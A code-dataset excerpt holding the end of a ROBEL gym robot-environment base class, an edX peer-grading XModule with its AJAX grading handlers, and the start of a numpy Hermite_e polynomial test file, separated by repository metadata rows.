self._action_space = self._initialize_action_space()
assert self._action_space is not None
return self._action_space
@property
def state_space(self) -> gym.Space:
"""Returns the state space of the environment.
The state space is the return specification for `get_state` and is the
argument specification for `set_state`.
Subclasses should override `_initialize_state_space` to customize the
state space.
"""
# Initialize and cache the state space on the first call.
if self._state_space is None:
self._state_space = self._initialize_state_space()
assert self._state_space is not None
return self._state_space
@property
def dt(self) -> float:
"""Returns the step duration of each step, in seconds."""
return self.sim_scene.step_duration
@property
def obs_dim(self) -> int:
"""Returns the size of the observation space.
NOTE: This is for compatibility with gym.MujocoEnv.
"""
if not isinstance(self.observation_space, spaces.Box):
raise NotImplementedError('`obs_dim` only supports Box spaces.')
return np.prod(self.observation_space.shape).item()
@property
def action_dim(self) -> int:
"""Returns the size of the action space."""
if not isinstance(self.action_space, spaces.Box):
raise NotImplementedError('`action_dim` only supports Box spaces.')
return np.prod(self.action_space.shape).item()
def seed(self, seed: Optional[int] = None) -> Sequence[int]:
"""Seeds the environment.
Args:
seed: The value to seed the random number generator with. If None,
uses a random seed.
"""
self.np_random, seed = seeding.np_random(seed)
return [seed]
def reset(self) -> Any:
"""Resets the environment.
Returns:
The initial observation of the environment after resetting.
"""
self.last_action = None
self.sim.reset()
self.sim.forward()
self._reset()
obs_dict = self.get_obs_dict()
self.last_obs_dict = obs_dict
self.last_reward_dict = None
self.last_score_dict = None
self.is_done = False
self.step_count = 0
return self._get_obs(obs_dict)
def step(self, action: Any) -> Tuple[Any, float, bool, Dict]:
"""Runs one timestep of the environment with the given action.
Subclasses must override 4 subcomponents of step:
- `_step`: Applies an action to the robot
- `get_obs_dict`: Returns the current observation of the robot.
- `get_reward_dict`: Calculates the reward for the step.
- `get_done`: Returns whether the episode should terminate.
Args:
action: An action to control the environment.
Returns:
observation: The observation of the environment after the timestep.
reward: The amount of reward obtained during the timestep.
done: Whether the episode has ended. `env.reset()` should be called
if this is True.
info: Auxiliary information about the timestep.
"""
# Perform the step.
action = self._preprocess_action(action)
self._step(action)
self.last_action = action
# Get the observation after the step.
obs_dict = self.get_obs_dict()
self.last_obs_dict = obs_dict
flattened_obs = self._get_obs(obs_dict)
# Get the rewards for the observation.
batched_action = np.expand_dims(np.atleast_1d(action), axis=0)
batched_obs_dict = {
k: np.expand_dims(np.atleast_1d(v), axis=0)
for k, v in obs_dict.items()
}
batched_reward_dict = self.get_reward_dict(batched_action,
batched_obs_dict)
# Calculate the total reward.
reward_dict = {k: v.item() for k, v in batched_reward_dict.items()}
self.last_reward_dict = reward_dict
reward = self._get_total_reward(reward_dict)
# Calculate the score.
batched_score_dict = self.get_score_dict(batched_obs_dict,
batched_reward_dict)
score_dict = {k: v.item() for k, v in batched_score_dict.items()}
self.last_score_dict = score_dict
# Get whether the episode should end.
dones = self.get_done(batched_obs_dict, batched_reward_dict)
done = dones.item()
self.is_done = done
# Combine the dictionaries as the auxiliary information.
info = collections.OrderedDict()
info.update(('obs/' + key, val) for key, val in obs_dict.items())
info.update(('reward/' + key, val) for key, val in reward_dict.items())
info['reward/total'] = reward
info.update(('score/' + key, val) for key, val in score_dict.items())
self.step_count += 1
return flattened_obs, reward, done, info
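        # Illustrative rollout sketch (added comment only): callers typically drive the
        # standard gym loop, which exercises _step/get_obs_dict/get_reward_dict above:
        #     obs = env.reset()
        #     done = False
        #     while not done:
        #         obs, reward, done, info = env.step(env.action_space.sample())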
def render(
self,
mode: str = 'human',
width: int = DEFAULT_RENDER_SIZE,
height: int = DEFAULT_RENDER_SIZE,
camera_id: int = -1,
) -> Optional[np.ndarray]:
"""Renders the environment.
Args:
mode: The type of rendering to use.
- 'human': Renders to a graphical window.
- 'rgb_array': Returns the RGB image as an np.ndarray.
- 'depth_array': Returns the depth image as an np.ndarray.
width: The width of the rendered image. This only affects offscreen
rendering.
height: The height of the rendered image. This only affects
offscreen rendering.
camera_id: The ID of the camera to use. By default, this is the free
camera. If specified, only affects offscreen rendering.
Returns:
If mode is `rgb_array` or `depth_array`, a Numpy array of the
rendered pixels. Otherwise, returns None.
"""
if mode == 'human':
self.sim_scene.renderer.render_to_window()
elif mode == 'rgb_array':
return self.sim_scene.renderer.render_offscreen(
width, height, mode=RenderMode.RGB, camera_id=camera_id)
elif mode == 'depth_array':
return self.sim_scene.renderer.render_offscreen(
width, height, mode=RenderMode.DEPTH, camera_id=camera_id)
else:
raise NotImplementedError(mode)
return None
def close(self):
"""Cleans up any resources used by the environment."""
for component in self._components:
component.close()
self._components.clear()
self.sim_scene.close()
#===========================================================================
# Overridable Methods
#===========================================================================
@abc.abstractmethod
def _reset(self):
"""Task-specific reset for the environment."""
@abc.abstractmethod
def _step(self, action: np.ndarray):
"""Task-specific step for the environment."""
@abc.abstractmethod
def get_obs_dict(self) -> Dict[str, Any]:
"""Returns the current observation of the environment.
Returns:
A dictionary of observation values. This should be an ordered
dictionary if `observation_keys` isn't set.
"""
@abc.abstractmethod
def get_reward_dict(
self,
action: np.ndarray,
obs_dict: Dict[str, np.ndarray],
) -> Dict[str, np.ndarray]:
"""Returns the reward for the given action and observation.
Args:
action: A batch of actions.
obs_dict: A dictionary of batched observations. The batch dimension
matches the batch dimension of the actions.
Returns:
A dictionary of reward components. The values should be batched to
match the given actions and observations.
"""
@abc.abstractmethod
def get_score_dict(
self,
obs_dict: Dict[str, np.ndarray],
reward_dict: Dict[str, np.ndarray],
) -> Dict[str, np.ndarray]:
"""Returns a standardized measure of success for the environment.
Args:
obs_dict: A dictionary of batched observations.
reward_dict: A dictionary of batched rewards to correspond with the
observations.
Returns:
A dictionary of scores.
"""
def get_done(
self,
obs_dict: Dict[str, np.ndarray],
reward_dict: Dict[str, np.ndarray],
) -> np.ndarray:
"""Returns whether the episode should terminate.
Args:
obs_dict: A dictionary of batched observations.
reward_dict: A dictionary of batched rewards to correspond with the
observations.
Returns:
A boolean to denote if the episode should terminate. This should
have the same batch dimension as the observations and rewards.
"""
del obs_dict
return np.zeros_like(next(iter(reward_dict.values())), dtype=bool)
def get_state(self) -> Any:
"""Returns the current state of the environment."""
return (self.data.qpos.copy(), self.data.qvel.copy())
def set_state(self, state: Any):
"""Sets the state of the environment."""
qpos, qvel = state
self.data.qpos[:] = qpos
self.data.qvel[:] = qvel
self.sim.forward()
def _initialize_observation_space(self) -> gym.Space:
"""Returns the observation space to use for this environment.
The default implementation calls `_get_obs()` and returns a dictionary
space if the observation is a mapping, or a box space otherwise.
"""
observation = self._get_obs()
if isinstance(observation, collections.Mapping):
assert self._use_dict_obs
return spaces.Dict({
key: make_box_space(-np.inf, np.inf, shape=np.shape(value))
for key, value in observation.items()
})
return make_box_space(-np.inf, np.inf, shape=observation.shape)
def _initialize_action_space(self) -> gym.Space:
"""Returns the action space to use for this environment.
The default implementation uses the simulation's control actuator
dimensions as the action space, using normalized actions in [-1, 1].
"""
return make_box_space(-1.0, 1.0, shape=(self.model.nu,))
def _initialize_state_space(self) -> gym.Space:
"""Returns the state space to use for this environment.
The default implementation calls `get_state()` and returns a space
corresponding to the type of the state object:
- Mapping: Dict space
- List/Tuple: Tuple space
"""
state = self.get_state()
if isinstance(state, collections.Mapping):
return spaces.Dict({
key: make_box_space(-np.inf, np.inf, shape=np.shape(value))
for key, value in state.items() # pylint: disable=no-member
})
elif isinstance(state, (list, tuple)):
return spaces.Tuple([
make_box_space(-np.inf, np.inf, shape=np.shape(value))
for value in state
])
raise NotImplementedError(
'Override _initialize_state_space for state: {}'.format(state))
def _get_last_action(self) -> np.ndarray:
"""Returns the previous action, or zeros if no action has been taken."""
if self.last_action is None:
return np.zeros((self.action_dim,), dtype=self.action_space.dtype)
return self.last_action
def _preprocess_action(self, action: np.ndarray) -> np.ndarray:
"""Transforms an action before passing it to `_step()`.
Args:
action: The action in the environment's action space.
Returns:
The transformed action to pass to `_step()`.
"""
# Clip to the normalized action space.
action = np.clip(action, -1.0, 1.0)
# Prevent elements of the action from changing if sticky actions are
# being used.
if self._sticky_action_probability > 0 and self.last_action is not None:
sticky_indices = (
self.np_random.uniform() < self._sticky_action_probability)
action = np.where(sticky_indices, self.last_action, action)
return action
def _get_obs(self, obs_dict: Optional[Dict[str, np.ndarray]] = None) -> Any:
"""Returns the current observation of the environment.
This matches the environment's observation space.
"""
if obs_dict is None:
obs_dict = self.get_obs_dict()
if self._use_dict_obs:
if self._observation_keys:
obs = collections.OrderedDict(
(key, obs_dict[key]) for key in self._observation_keys)
else:
obs = obs_dict
else:
if self._observation_keys:
obs_values = (obs_dict[key] for key in self._observation_keys)
else:
assert isinstance(obs_dict, collections.OrderedDict), \
'Must use OrderedDict if not using `observation_keys`'
obs_values = obs_dict.values()
obs = np.concatenate([np.ravel(v) for v in obs_values])
return obs
def _get_total_reward(self, reward_dict: Dict[str, np.ndarray]) -> float:
"""Returns the total reward for the given reward dictionary.
The default implementation extracts the keys from `reward_keys` and sums
the values.
Args:
reward_dict: A dictionary of rewards. The values may have a batch
dimension.
Returns:
The total reward for the dictionary.
"""
# TODO(michaelahn): Enforce that the reward values are scalar.
if self._reward_keys:
reward_values = (reward_dict[key] for key in self._reward_keys)
else:
reward_values = reward_dict.values()
return np.sum(np.fromiter(reward_values, dtype=float))
def _add_component(self, component_builder: ComponentBuilder,
**component_kwargs) -> Any:
"""Creates a new component for this environment instance.
Args:
component_builder: The configured ComponentBuilder to build the
component with.
"""
# Build the component.
component = component_builder.build(
sim_scene=self.sim_scene,
random_state=self.np_random,
**component_kwargs)
self._components.append(component)
return component
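# Minimal subclass sketch (added; illustrative only, not part of the ROBEL API). The XML
# path, observation key and reward name are placeholders; it only shows which abstract
# hooks above a concrete task must provide.
#
#     class ExampleReachEnv(RobotEnv):
#         def __init__(self, **kwargs):
#             super(ExampleReachEnv, self).__init__(
#                 sim_model='example_scene.xml', **kwargs)
#         def _reset(self):
#             pass  # e.g. randomize a goal pose here
#         def _step(self, action):
#             # Assumption: the simulation exposes a way to advance by one control step.
#             self.sim_scene.advance()
#         def get_obs_dict(self):
#             return collections.OrderedDict(qpos=self.data.qpos.copy())
#         def get_reward_dict(self, action, obs_dict):
#             return collections.OrderedDict(zero=np.zeros(action.shape[0]))
#         def get_score_dict(self, obs_dict, reward_dict):
#             return collections.OrderedDict(success=np.zeros_like(reward_dict['zero']))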
| apache-2.0 | 4,666,393,830,502,631,000 | -2,270,375,703,700,011,000 | 37.548736 | 80 | 0.594306 | false |
rismalrv/edx-platform | common/lib/xmodule/xmodule/peer_grading_module.py | 56 | 29601 | import json
import logging
from datetime import datetime
from django.utils.timezone import UTC
from lxml import etree
from pkg_resources import resource_string
from xblock.fields import Dict, String, Scope, Boolean, Float, Reference
from xmodule.capa_module import ComplexEncoder
from xmodule.fields import Date, Timedelta
from xmodule.modulestore.exceptions import ItemNotFoundError, NoPathToItem
from xmodule.raw_module import RawDescriptor
from xmodule.timeinfo import TimeInfo
from xmodule.x_module import XModule, module_attr
from xmodule.open_ended_grading_classes.peer_grading_service import PeerGradingService, MockPeerGradingService
from xmodule.open_ended_grading_classes.grading_service_module import GradingServiceError
from xmodule.validation import StudioValidation, StudioValidationMessage
from open_ended_grading_classes import combined_open_ended_rubric
log = logging.getLogger(__name__)
# Make '_' a no-op so we can scrape strings
_ = lambda text: text
EXTERNAL_GRADER_NO_CONTACT_ERROR = "Failed to contact external graders. Please notify course staff."
MAX_ALLOWED_FEEDBACK_LENGTH = 5000
class PeerGradingFields(object):
use_for_single_location = Boolean(
display_name=_("Show Single Problem"),
help=_('When True, only the single problem specified by "Link to Problem Location" is shown. '
'When False, a panel is displayed with all problems available for peer grading.'),
default=False,
scope=Scope.settings
)
link_to_location = Reference(
display_name=_("Link to Problem Location"),
help=_('The location of the problem being graded. Only used when "Show Single Problem" is True.'),
default="",
scope=Scope.settings
)
graded = Boolean(
display_name=_("Graded"),
help=_('Defines whether the student gets credit for grading this problem. Only used when "Show Single Problem" is True.'),
default=False,
scope=Scope.settings
)
due = Date(
help=_("Due date that should be displayed."),
scope=Scope.settings)
graceperiod = Timedelta(
help=_("Amount of grace to give on the due date."),
scope=Scope.settings
)
student_data_for_location = Dict(
help=_("Student data for a given peer grading problem."),
scope=Scope.user_state
)
weight = Float(
display_name=_("Problem Weight"),
help=_("Defines the number of points each problem is worth. If the value is not set, each problem is worth one point."),
scope=Scope.settings, values={"min": 0, "step": ".1"},
default=1
)
display_name = String(
display_name=_("Display Name"),
help=_("Display name for this module"),
scope=Scope.settings,
default=_("Peer Grading Interface")
)
data = String(
help=_("Html contents to display for this module"),
default='<peergrading></peergrading>',
scope=Scope.content
)
class InvalidLinkLocation(Exception):
"""
Exception for the case in which a peer grading module tries to link to an invalid location.
"""
pass
class PeerGradingModule(PeerGradingFields, XModule):
"""
PeerGradingModule.__init__ takes the same arguments as xmodule.x_module:XModule.__init__
"""
_VERSION = 1
js = {
'coffee': [
resource_string(__name__, 'js/src/peergrading/peer_grading.coffee'),
resource_string(__name__, 'js/src/peergrading/peer_grading_problem.coffee'),
resource_string(__name__, 'js/src/javascript_loader.coffee'),
],
'js': [
resource_string(__name__, 'js/src/collapsible.js'),
]
}
js_module_name = "PeerGrading"
css = {'scss': [resource_string(__name__, 'css/combinedopenended/display.scss')]}
def __init__(self, *args, **kwargs):
super(PeerGradingModule, self).__init__(*args, **kwargs)
# Copy this to a new variable so that we can edit it if needed.
# We need to edit it if the linked module cannot be found, so
# we can revert to panel model.
self.use_for_single_location_local = self.use_for_single_location
# We need to set the location here so the child modules can use it.
self.runtime.set('location', self.location)
if self.runtime.open_ended_grading_interface:
self.peer_gs = PeerGradingService(self.system.open_ended_grading_interface, self.system.render_template)
else:
self.peer_gs = MockPeerGradingService()
if self.use_for_single_location_local:
linked_descriptors = self.descriptor.get_required_module_descriptors()
if len(linked_descriptors) == 0:
error_msg = "Peer grading module {0} is trying to use single problem mode without "
"a location specified.".format(self.location)
log.error(error_msg)
# Change module over to panel mode from single problem mode.
self.use_for_single_location_local = False
else:
self.linked_problem = self.system.get_module(linked_descriptors[0])
try:
self.timeinfo = TimeInfo(self.due, self.graceperiod)
except Exception:
log.error("Error parsing due date information in location {0}".format(self.location))
raise
self.display_due_date = self.timeinfo.display_due_date
try:
self.student_data_for_location = json.loads(self.student_data_for_location)
except Exception: # pylint: disable=broad-except
# OK with this broad exception because we just want to continue on any error
pass
@property
def ajax_url(self):
"""
Returns the `ajax_url` from the system, with any trailing '/' stripped off.
"""
ajax_url = self.system.ajax_url
if not ajax_url.endswith("/"):
ajax_url += "/"
return ajax_url
def closed(self):
return self._closed(self.timeinfo)
def _closed(self, timeinfo):
if timeinfo.close_date is not None and datetime.now(UTC()) > timeinfo.close_date:
return True
return False
def _err_response(self, msg):
"""
Return a HttpResponse with a json dump with success=False, and the given error message.
"""
return {'success': False, 'error': msg}
def _check_required(self, data, required):
actual = set(data.keys())
missing = required - actual
if len(missing) > 0:
return False, "Missing required keys: {0}".format(', '.join(missing))
else:
return True, ""
def get_html(self):
"""
Needs to be implemented by inheritors. Renders the HTML that students see.
@return:
"""
if self.closed():
return self.peer_grading_closed()
if not self.use_for_single_location_local:
return self.peer_grading()
else:
# b/c handle_ajax expects serialized data payload and directly calls peer_grading
return self.peer_grading_problem({'location': self.link_to_location.to_deprecated_string()})['html']
def handle_ajax(self, dispatch, data):
"""
Needs to be implemented by child modules. Handles AJAX events.
@return:
"""
handlers = {
'get_next_submission': self.get_next_submission,
'show_calibration_essay': self.show_calibration_essay,
'is_student_calibrated': self.is_student_calibrated,
'save_grade': self.save_grade,
'save_calibration_essay': self.save_calibration_essay,
'problem': self.peer_grading_problem,
}
if dispatch not in handlers:
# This is a dev_facing_error
log.error("Cannot find {0} in handlers in handle_ajax function for open_ended_module.py".format(dispatch))
# This is a dev_facing_error
return json.dumps({'error': 'Error handling action. Please try again.', 'success': False})
data_dict = handlers[dispatch](data)
return json.dumps(data_dict, cls=ComplexEncoder)
def query_data_for_location(self, location):
student_id = self.system.anonymous_student_id
success = False
response = {}
try:
response = self.peer_gs.get_data_for_location(location, student_id)
_count_graded = response['count_graded']
_count_required = response['count_required']
success = True
except GradingServiceError:
# This is a dev_facing_error
log.exception("Error getting location data from controller for location %s, student %s", location, student_id)
return success, response
def get_progress(self):
pass
def get_score(self):
max_score = None
score = None
weight = self.weight
#The old default was None, so set to 1 if it is the old default weight
if weight is None:
weight = 1
score_dict = {
'score': score,
'total': max_score,
}
if not self.use_for_single_location_local or not self.graded:
return score_dict
try:
count_graded = self.student_data_for_location['count_graded']
count_required = self.student_data_for_location['count_required']
except:
success, response = self.query_data_for_location(self.link_to_location)
if not success:
log.exception(
"No instance data found and could not get data from controller for loc {0} student {1}".format(
self.system.location.to_deprecated_string(), self.system.anonymous_student_id
))
return None
count_graded = response['count_graded']
count_required = response['count_required']
if count_required > 0 and count_graded >= count_required:
            # Ensures that once a student receives a final score for peer grading, it does not change.
self.student_data_for_location = response
score = int(count_graded >= count_required and count_graded > 0) * float(weight)
total = float(weight)
score_dict['score'] = score
score_dict['total'] = total
return score_dict
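    # Illustrative walk-through (not part of the original module): with weight = 1,
    # the rule above awards full credit once the student has graded at least the
    # required number of peers:
    #   count_required = 3, count_graded = 3  ->  score = 1.0, total = 1.0
    #   count_required = 3, count_graded = 1  ->  score = 0.0, total = 1.0
    # i.e. score = int(count_graded >= count_required and count_graded > 0) * weight.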
def max_score(self):
        ''' Maximum score. Note:
            * This is generic; in the abstract, a problem could be 3/5 points on one
              randomization, and 5/7 on another
'''
max_grade = None
if self.use_for_single_location_local and self.graded:
max_grade = self.weight
return max_grade
def get_next_submission(self, data):
"""
Makes a call to the grading controller for the next essay that should be graded
Returns a json dict with the following keys:
'success': bool
'submission_id': a unique identifier for the submission, to be passed back
with the grade.
'submission': the submission, rendered as read-only html for grading
'rubric': the rubric, also rendered as html.
'submission_key': a key associated with the submission for validation reasons
'error': if success is False, will have an error message with more info.
"""
required = set(['location'])
success, message = self._check_required(data, required)
if not success:
return self._err_response(message)
grader_id = self.system.anonymous_student_id
location = data['location']
try:
response = self.peer_gs.get_next_submission(location, grader_id)
return response
except GradingServiceError:
# This is a dev_facing_error
log.exception("Error getting next submission. server url: %s location: %s, grader_id: %s", self.peer_gs.url, location, grader_id)
# This is a student_facing_error
return {'success': False,
'error': EXTERNAL_GRADER_NO_CONTACT_ERROR}
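    # Illustrative sketch (not part of the original module): on success, the response
    # passed through from the grading controller is a dict with the keys listed in the
    # docstring above, e.g. (all values below are made up):
    #   {'success': True,
    #    'submission_id': 42,
    #    'submission_key': 'abc123',
    #    'submission': '<div>essay rendered as read-only html</div>',
    #    'rubric': '<table>rubric rendered as html</table>'}
    # On failure, a dict of the form {'success': False, 'error': '...'} is returned.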
def save_grade(self, data):
"""
Saves the grade of a given submission.
Input:
The request should have the following keys:
location - problem location
submission_id - id associated with this submission
submission_key - submission key given for validation purposes
score - the grade that was given to the submission
feedback - the feedback from the student
Returns
A json object with the following keys:
success: bool indicating whether the save was a success
error: if there was an error in the submission, this is the error message
"""
required = ['location', 'submission_id', 'submission_key', 'score', 'feedback', 'submission_flagged', 'answer_unknown']
if data.get("submission_flagged", False) in ["false", False, "False", "FALSE"]:
required.append("rubric_scores[]")
success, message = self._check_required(data, set(required))
if not success:
return self._err_response(message)
success, message = self._check_feedback_length(data)
if not success:
return self._err_response(message)
data_dict = {k: data.get(k) for k in required}
if 'rubric_scores[]' in required:
data_dict['rubric_scores'] = data.getall('rubric_scores[]')
data_dict['grader_id'] = self.system.anonymous_student_id
try:
response = self.peer_gs.save_grade(**data_dict)
success, location_data = self.query_data_for_location(data_dict['location'])
            # Don't check `success` above because the `response =` statement will raise
            # the same exception that would cause `success` to be False.
response.update({'required_done': False})
if 'count_graded' in location_data and 'count_required' in location_data and int(location_data['count_graded']) >= int(location_data['count_required']):
response['required_done'] = True
return response
except GradingServiceError:
# This is a dev_facing_error
log.exception("Error saving grade to open ended grading service. server url: %s", self.peer_gs.url)
# This is a student_facing_error
return {
'success': False,
'error': EXTERNAL_GRADER_NO_CONTACT_ERROR
}
def is_student_calibrated(self, data):
"""
Calls the grading controller to see if the given student is calibrated
on the given problem
Input:
In the request, we need the following arguments:
location - problem location
Returns:
Json object with the following keys
success - bool indicating whether or not the call was successful
calibrated - true if the grader has fully calibrated and can now move on to grading
- false if the grader is still working on calibration problems
total_calibrated_on_so_far - the number of calibration essays for this problem
that this grader has graded
"""
required = set(['location'])
success, message = self._check_required(data, required)
if not success:
return self._err_response(message)
grader_id = self.system.anonymous_student_id
location = data['location']
try:
response = self.peer_gs.is_student_calibrated(location, grader_id)
return response
except GradingServiceError:
# This is a dev_facing_error
log.exception("Error from open ended grading service. server url: %s, grader_id: %s, location: %s", self.peer_gs.url, grader_id, location)
# This is a student_facing_error
return {
'success': False,
'error': EXTERNAL_GRADER_NO_CONTACT_ERROR
}
def show_calibration_essay(self, data):
"""
Fetch the next calibration essay from the grading controller and return it
Inputs:
In the request
location - problem location
Returns:
A json dict with the following keys
'success': bool
'submission_id': a unique identifier for the submission, to be passed back
with the grade.
'submission': the submission, rendered as read-only html for grading
'rubric': the rubric, also rendered as html.
'submission_key': a key associated with the submission for validation reasons
'error': if success is False, will have an error message with more info.
"""
required = set(['location'])
success, message = self._check_required(data, required)
if not success:
return self._err_response(message)
grader_id = self.system.anonymous_student_id
location = data['location']
try:
response = self.peer_gs.show_calibration_essay(location, grader_id)
return response
except GradingServiceError:
# This is a dev_facing_error
log.exception("Error from open ended grading service. server url: %s, location: %s", self.peer_gs.url, location)
# This is a student_facing_error
return {'success': False,
'error': EXTERNAL_GRADER_NO_CONTACT_ERROR}
# if we can't parse the rubric into HTML,
except etree.XMLSyntaxError:
# This is a dev_facing_error
log.exception("Cannot parse rubric string.")
# This is a student_facing_error
return {'success': False,
'error': 'Error displaying submission. Please notify course staff.'}
def save_calibration_essay(self, data):
"""
Saves the grader's grade of a given calibration.
Input:
The request should have the following keys:
location - problem location
submission_id - id associated with this submission
submission_key - submission key given for validation purposes
score - the grade that was given to the submission
feedback - the feedback from the student
Returns
A json object with the following keys:
success: bool indicating whether the save was a success
error: if there was an error in the submission, this is the error message
actual_score: the score that the instructor gave to this calibration essay
"""
required = set(['location', 'submission_id', 'submission_key', 'score', 'feedback', 'rubric_scores[]'])
success, message = self._check_required(data, required)
if not success:
return self._err_response(message)
data_dict = {k: data.get(k) for k in required}
data_dict['rubric_scores'] = data.getall('rubric_scores[]')
data_dict['student_id'] = self.system.anonymous_student_id
data_dict['calibration_essay_id'] = data_dict['submission_id']
try:
response = self.peer_gs.save_calibration_essay(**data_dict)
if 'actual_rubric' in response:
rubric_renderer = combined_open_ended_rubric.CombinedOpenEndedRubric(self.system.render_template, True)
response['actual_rubric'] = rubric_renderer.render_rubric(response['actual_rubric'])['html']
return response
except GradingServiceError:
# This is a dev_facing_error
log.exception("Error saving calibration grade")
# This is a student_facing_error
return self._err_response('There was an error saving your score. Please notify course staff.')
def peer_grading_closed(self):
'''
Show the Peer grading closed template
'''
html = self.system.render_template('peer_grading/peer_grading_closed.html', {
'use_for_single_location': self.use_for_single_location_local
})
return html
def _find_corresponding_module_for_location(self, location):
"""
Find the peer grading module that exists at the given location.
"""
try:
return self.descriptor.system.load_item(location)
except ItemNotFoundError:
# The linked problem doesn't exist.
log.error("Problem {0} does not exist in this course.".format(location))
raise
except NoPathToItem:
# The linked problem does not have a path to it (ie is in a draft or other strange state).
log.error("Cannot find a path to problem {0} in this course.".format(location))
raise
def peer_grading(self, _data=None):
'''
Show a peer grading interface
'''
# call problem list service
success = False
error_text = ""
problem_list = []
try:
problem_list_dict = self.peer_gs.get_problem_list(self.course_id, self.system.anonymous_student_id)
success = problem_list_dict['success']
if 'error' in problem_list_dict:
error_text = problem_list_dict['error']
problem_list = problem_list_dict['problem_list']
except GradingServiceError:
# This is a student_facing_error
error_text = EXTERNAL_GRADER_NO_CONTACT_ERROR
log.error(error_text)
success = False
        # catch the error if the json load fails
except ValueError:
# This is a student_facing_error
error_text = "Could not get list of problems to peer grade. Please notify course staff."
log.error(error_text)
success = False
except Exception:
log.exception("Could not contact peer grading service.")
success = False
good_problem_list = []
for problem in problem_list:
problem_location = problem['location']
try:
descriptor = self._find_corresponding_module_for_location(problem_location)
except (NoPathToItem, ItemNotFoundError):
continue
if descriptor:
problem['due'] = descriptor.due
grace_period = descriptor.graceperiod
try:
problem_timeinfo = TimeInfo(problem['due'], grace_period)
except Exception:
log.error("Malformed due date or grace period string for location {0}".format(problem_location))
raise
if self._closed(problem_timeinfo):
problem['closed'] = True
else:
problem['closed'] = False
else:
# if we can't find the due date, assume that it doesn't have one
problem['due'] = None
problem['closed'] = False
good_problem_list.append(problem)
ajax_url = self.ajax_url
html = self.system.render_template('peer_grading/peer_grading.html', {
'ajax_url': ajax_url,
'success': success,
'problem_list': good_problem_list,
'error_text': error_text,
# Checked above
'staff_access': False,
'use_single_location': self.use_for_single_location_local,
})
return html
def peer_grading_problem(self, data=None):
'''
Show individual problem interface
'''
if data is None or data.get('location') is None:
if not self.use_for_single_location_local:
# This is an error case, because it must be set to use a single location to be called without get parameters
# This is a dev_facing_error
log.error(
"Peer grading problem in peer_grading_module called with no get parameters, but use_for_single_location is False.")
return {'html': "", 'success': False}
problem_location = self.link_to_location
elif data.get('location') is not None:
problem_location = self.course_id.make_usage_key_from_deprecated_string(data.get('location'))
self._find_corresponding_module_for_location(problem_location)
ajax_url = self.ajax_url
html = self.system.render_template('peer_grading/peer_grading_problem.html', {
'view_html': '',
'problem_location': problem_location,
'course_id': self.course_id,
'ajax_url': ajax_url,
# Checked above
'staff_access': False,
'use_single_location': self.use_for_single_location_local,
})
return {'html': html, 'success': True}
def get_instance_state(self):
"""
Returns the current instance state. The module can be recreated from the instance state.
Input: None
Output: A dictionary containing the instance state.
"""
state = {
'student_data_for_location': self.student_data_for_location,
}
return json.dumps(state)
def _check_feedback_length(self, data):
feedback = data.get("feedback")
if feedback and len(feedback) > MAX_ALLOWED_FEEDBACK_LENGTH:
return False, "Feedback is too long, Max length is {0} characters.".format(
MAX_ALLOWED_FEEDBACK_LENGTH
)
else:
return True, ""
def validate(self):
"""
        Returns either error or warning validation messages, along with their type.
        Error messages take priority over warnings.
"""
return self.descriptor.validate()
class PeerGradingDescriptor(PeerGradingFields, RawDescriptor):
"""
Module for adding peer grading questions
"""
mako_template = "widgets/raw-edit.html"
module_class = PeerGradingModule
filename_extension = "xml"
has_score = True
always_recalculate_grades = True
#Specify whether or not to pass in open ended interface
needs_open_ended_interface = True
metadata_translations = {
'is_graded': 'graded',
'attempts': 'max_attempts',
'due_data': 'due'
}
@property
def non_editable_metadata_fields(self):
non_editable_fields = super(PeerGradingDescriptor, self).non_editable_metadata_fields
non_editable_fields.extend([PeerGradingFields.due, PeerGradingFields.graceperiod])
return non_editable_fields
def get_required_module_descriptors(self):
"""
Returns a list of XModuleDescriptor instances upon which this module depends, but are
not children of this module.
"""
# If use_for_single_location is True, this is linked to an open ended problem.
if self.use_for_single_location:
# Try to load the linked module.
# If we can't load it, return empty list to avoid exceptions on progress page.
try:
linked_module = self.system.load_item(self.link_to_location)
return [linked_module]
except (NoPathToItem, ItemNotFoundError):
error_message = ("Cannot find the combined open ended module "
"at location {0} being linked to from peer "
"grading module {1}").format(self.link_to_location, self.location)
log.error(error_message)
return []
else:
return []
# Proxy to PeerGradingModule so that external callers don't have to know if they're working
# with a module or a descriptor
closed = module_attr('closed')
get_instance_state = module_attr('get_instance_state')
get_next_submission = module_attr('get_next_submission')
graded = module_attr('graded')
is_student_calibrated = module_attr('is_student_calibrated')
peer_grading = module_attr('peer_grading')
peer_grading_closed = module_attr('peer_grading_closed')
peer_grading_problem = module_attr('peer_grading_problem')
peer_gs = module_attr('peer_gs')
query_data_for_location = module_attr('query_data_for_location')
save_calibration_essay = module_attr('save_calibration_essay')
save_grade = module_attr('save_grade')
show_calibration_essay = module_attr('show_calibration_essay')
use_for_single_location_local = module_attr('use_for_single_location_local')
_find_corresponding_module_for_location = module_attr('_find_corresponding_module_for_location')
def validate(self):
"""
Validates the state of this instance. This is the override of the general XBlock method,
and it will also ask its superclass to validate.
"""
validation = super(PeerGradingDescriptor, self).validate()
validation = StudioValidation.copy(validation)
i18n_service = self.runtime.service(self, "i18n")
validation.summary = StudioValidationMessage(
StudioValidationMessage.ERROR,
i18n_service.ugettext(
"ORA1 is no longer supported. To use this assessment, "
"replace this ORA1 component with an ORA2 component."
)
)
return validation
| agpl-3.0 | -983,219,990,073,663,500 | 2,153,952,094,998,848,500 | 38.947368 | 164 | 0.609439 | false |
CallaJun/hackprince | indico/numpy/polynomial/tests/test_hermite_e.py | 123 | 17069 | """Tests for hermite_e module.
"""
from __future__ import division, absolute_import, print_function
import numpy as np
import numpy.polynomial.hermite_e as herme
from numpy.polynomial.polynomial import polyval
from numpy.testing import (
TestCase, assert_almost_equal, assert_raises,
assert_equal, assert_, run_module_suite)
He0 = np.array([1])
He1 = np.array([0, 1])
He2 = np.array([-1, 0, 1])
He3 = np.array([0, -3, 0, 1])
He4 = np.array([3, 0, -6, 0, 1])
He5 = np.array([0, 15, 0, -10, 0, 1])
He6 = np.array([-15, 0, 45, 0, -15, 0, 1])
He7 = np.array([0, -105, 0, 105, 0, -21, 0, 1])
He8 = np.array([105, 0, -420, 0, 210, 0, -28, 0, 1])
He9 = np.array([0, 945, 0, -1260, 0, 378, 0, -36, 0, 1])
Helist = [He0, He1, He2, He3, He4, He5, He6, He7, He8, He9]
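# Illustrative note (not part of the original test module): the arrays above are the
# power-basis coefficients of the probabilists' Hermite polynomials, which satisfy the
# recurrence He_{n+1}(x) = x*He_n(x) - n*He_{n-1}(x).  Quick check: He2 = x**2 - 1, so
# x*He2(x) - 2*He1(x) = x**3 - 3*x, matching He3 above.  Equivalently:
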